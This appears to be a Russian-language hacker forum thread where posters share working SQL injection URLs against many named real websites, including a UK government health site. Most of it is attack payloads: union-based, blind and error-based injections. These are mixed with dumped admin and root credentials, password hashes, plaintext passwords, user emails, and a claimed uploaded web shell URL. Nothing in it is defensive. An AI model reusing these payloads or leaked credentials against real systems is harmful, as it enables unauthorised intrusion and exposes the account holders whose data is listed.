Решил выложить в паблик RAP.ru 5.0.30-Debian_3-log Cоответственно информ шема и таблица Admins Поля Nick и Passwd Administrator:bf7b9529faef3cf1cb6f56dca50c86df:dtcyfktnj finger:d47e7c43b07bfbe06be1f88acb48d482 есть админка на rap.ru/admin - но там бейсик авторизация по .htpasswd На форуме не получается залогинится под одним из админов, так же нет доступа к бд форума через инъект ЗЫ Там же на сайте, в поиске XSS =) Админы не закроют багу до поднятия шела, ибо им пофек =)
Сильно не пинайте... Первый вклад SQL-Inj... Code: http://asamsu.ru/asamsu.php?id=-1+union+select+0,1,concat(version(),char(58),user(),char(58),database()),3/* Нарыл таблицы... Code: asa_news, asa_partners, asa_foto, asa_video, asa_dance, asa_materials, asa_pres, asa_price Копаю дальше. Вот ошибка и база к форуму... Code: http://www.asamsu.ru/forum/index.php?showtopic=978&st=-1 А дальше, дело техники... Code: http://asamsu.ru/asamsu.php?id=-1+union+select+0,1,concat(converge_id,char(58),converge_email,char(58),converge_joined,char(58),converge_pass_hash,char(58),converge_pass_salt),3+from+asamsu_forum.forum_members_converge+where+converge_id=1/* P.S.: Немного колдовства над паролем админа и шелл залит... Code: http://www.asamsu.ru/img/news/av-2919.php
Code: http://www.aldenvet.kiev.ua/news/viewnews.php?kley=-1478 UNION SELECT1,2,VERSION(),4,5,6,7 4 версия Ничего интерсного случайно наткнулся... Если кому интересно рядом стоит форум phpbb
www.wiredforhealth.gov.uk Code: http://www.wiredforhealth.gov.uk/cat.php?catid=-1+union+select+1,2,3/* Code: http://www.wiredforhealth.gov.uk/search.php?catid=-1+union+select+1,2,3/* Code: http://www.wiredforhealth.gov.uk/feedback.php?catid=-1+union+select+1,2,3/* Теперь самое интересное. Blind SQL-injecting Code: http://www.wiredforhealth.gov.uk/cat.php?catid=857+and+ascii(lower(substring((select+password+from+mysql.user+where+user='root'+limit+1),1,1)))<110 database_name = webstructure user = root@localhost version = 4.1.0-alpha-loh root:758a0e1c73f5e6fa:garand01 host = % - разрешено с любого хоста Предположительно, сервер работает под SunOS. Работает LOAD_FILE(). Уже несколько месяцев прошло, админ до сих пор не прикрыл баги (вероятно, ему пофигу), поэтому и выкладываю.
torpal.com.ua - торговое оборудование Версия: 5.0.27 Пользователь: torpal@localhost Code: http://www.torpal.com.ua/faq/?pm=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),char(58),user(),char(58),database()),10,11,12/* Login: admin Password: torpal_1506 Code: http://www.torpal.com.ua/faq/?pm=-1+union+select+1,2,3,4,5,6,7,8,concat(login,char(58),password),10,11,12+from+t_users/* P.S.: Админку не нашел
ctk.kiev.ua - центральные театральные кассы Версия: 4.0.27-standard-log Пользователь: ctk_admin@localhost Code: http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(version(),char(58),user(),char(58),database()),8,9,10,11,12,13,14,15,16,17,18,19/* Надыбал таблицу 'categories': Code: http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(id,char(58),name),8,9,10,11,12,13,14,15,16,17,18,19+from+categories/* Собственно рядом phpBB в нокауте лежит Admin:61630e9cf1332bc73777a4238cc6fdfa:[email protected] Code: http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(username,char(58),user_password,char(58),user_email),8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users+where+user_level=1/* P.S.: У кого есть интерес глубже копать - делитесь плодами...
ildeposito.org Code: http://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())/* 108 таблиц: Code: http://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables+limit+107,1/* root: Code: http://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,concat_ws(0x3a,User,Password)+from+mysql.user/* root:*8C9EAD7FBDD7E16892FA0D3088DB9E47FAB3FCD3 Интересные таблицы: jos_users, wp_users и др. israelbasket.com - Израильский Баскетбол Code: http://www.israelbasket.com/clubs.php?club=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/* 4.1.22-standard-log:israelfo_israelfootball:israelfo@localhost с табами - запарка...
_http://www.tonnel.ru mysql - 5 версии, всего в базе присутствует 133 таблицы Ковычки не фильтруются, НО прав на чтение-запись нету!( Code: http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.tables+limit+x,1/* вот таблица приглянулась - digest_user Code: http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(name,char(58),email,char(58),passwd),5,6,7,8,9,10,11,12,13+from+savinov.digest_user+limit+0,1/* Максим:[email protected]:43957 и - music_user Code: http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(username,char(58),email,char(58),passwd),5,6,7,8,9,10,11,12,13+from+savinov.music_user+limit+0,1/* Максим:[email protected]:vermax (под этим логином-паролем можно зайти на форум _http://www.tonnel.ru/board/)
Неожиданно наткнулся ... lemon64.com - прикольный портальчик Code: http://www.lemon64.com/?mainurl=http%3A//www.lemon64.com/reviews/view.php%3Fid%3D-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* Таблица forum_users: логин, пасс, уровень, мыло, ася, сайт, aim, yim, msnm, occ Code: http://www.lemon64.com/?mainurl=http%3A//www.lemon64.com/reviews/view.php%3Fid%3D-1+union+select+1,concat_ws(0x3a,username,user_password,user_level,user_email,user_icq,user_website,user_aim,user_yim,user_msnm,user_occ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+forum_users+limit+1,1/* Админ: Kim Lemon:5967da78a21bd240b87d53bf568e7558
www.ziegler-film.com Code: http://www.ziegler-film.com/de/et/prod.html?lang=EN&ID=9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* ver: 4.0.24_Debian-10sarge2-log user: fml@localhost base: ziegler прав на чтение mysql.user нет.
Code: http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8/* 5.1.11-beta Code: http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(password,0x3a,user),5,6,7,8+from+mysql.user/* root:*E372920927493C3BCEA6654A14218A59970A3D11:gfhjkm Юзеры(пароли в чистом виде) Code: http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(name,0x3a,passw,0x3a,email,0x3a),5,6,7,8+from+ph_user+limit+700,1/* thx to F!$T
Code: http://[COLOR=YellowGreen]www.fnazca.com.br[/COLOR]/news/news.php?id_news=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71),2,3,4,5,6,7,8/* 4.1.12-standard-log root:*542F4346222B98A7FB425DC2F817BEBE84DD56AA Code: http://[COLOR=YellowGreen]www.poloarqdec.com.br[/COLOR]/index.php?id=noticias&id_news=-1+union+select+1,2,3,version()/* 4.0.18'-Max'-log Code: http://[COLOR=YellowGreen]www.somov.com.br[/COLOR]/news_ler.php?id_news=-1+union+select+1,version(),user(),4,5,6,7,8/* 5.0.41--log [email protected] Code: http://[COLOR=YellowGreen]www.somov.com.br[/COLOR]/news_ler.php?id_news=-1+union+select+1,concat(login,0x3a,senha),3,4,5,6,7,8+from+cad_administrador+limit+0,1/* andre:mestre usadas:somov fernanda:somovfe ' or 1=1/*:123 Code: http://[COLOR=YellowGreen]www.polmozbyt.krakow.pl[/COLOR]/index.php?m=ss&id_ma=1&id_mo=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 4.1.20-log Code: http://[COLOR=YellowGreen]www.fsb-ae.com[/COLOR]/projects/detail.php?id=-1+union+select+1,2,user(),version(),5,6,7,8,9,10,11,12/*&type=Landmarks frankf4_fsbae@localhost 4.0.25-standard Code: http://[COLOR=YellowGreen]www.fsb-ae.com[/COLOR]/projects/detail.php?id=-1+union+select+1,2,3,concat(name,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12+from+users/*&type=Landmarks Visual Inventor:06a80fec34e9262b:[email protected] итд Code: http://[COLOR=YellowGreen]ims.edu.in/[/COLOR]course_details.aspx?id=1+or+1=@@version-- 'Microsoft SQL Server 2000 Code: http://[COLOR=YellowGreen]ims.edu.in[/COLOR]/course_details.aspx?id=1%20or%201=(select+top+1+cast(admin_id+as+nvarchar)%2B%27%3A%27%2Bcast(admin_name+as+nvarchar)%2B%27%3A%27%2Bcast(admin_pasword+as+nvarchar)%20from%20tblAdminLogin)-- '1:admin:admin'
dukemednews.org Code: http://dukemednews.org/gallery/detail.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/* 4.0.18:news:[email protected] root: Code: http://dukemednews.org/gallery/detail.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5+from+mysql.user/* root:623460e26f081bbc
Code: http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8+from+users/* это для фанатов Динам0! а вот что дальше делать я не понимаю... колонки login pass пустые
Это походу не использующаяся табличка вот нашел: Code: http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+ut_users/*
Мобильные аксесуары HTML: http://era.in.ua/line3.php?lng=ru&art=-217%20union%20select%201,2,concat(user_login,0x3b,user_passw),4,5,6,7+from+auth_users/* Скул 5
trouserpress.com Code: http://www.trouserpress.com/entry.php?a=8romeo_void'+union+select+1,concat_ws(char(58),version(),user(),database()),3,4+--+&tr=y 4.1.22-standard:trouserp@localhost:trouserp_trouser hitkaraoke.com Code: http://www.hitkaraoke.com/category_search.asp?CATID=186+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) db: HIT user: hitusr1 AdminLogin: login:dink911 password:sp0ng3b0b Customers: Email:[email protected] Password: dink Админку не нашел
Сеть мебельных центров <<Грэйт>> Code: http://www.greatmebel.ru/products/?cat=SQL_INJ Версия БД - 5.0.45 Админка: /admin/ Логин: Dimon Пароль: 11111 Логин: Kostan Пароль: 99bd7225e7b5f895a36b5833342a3756 (MD5)
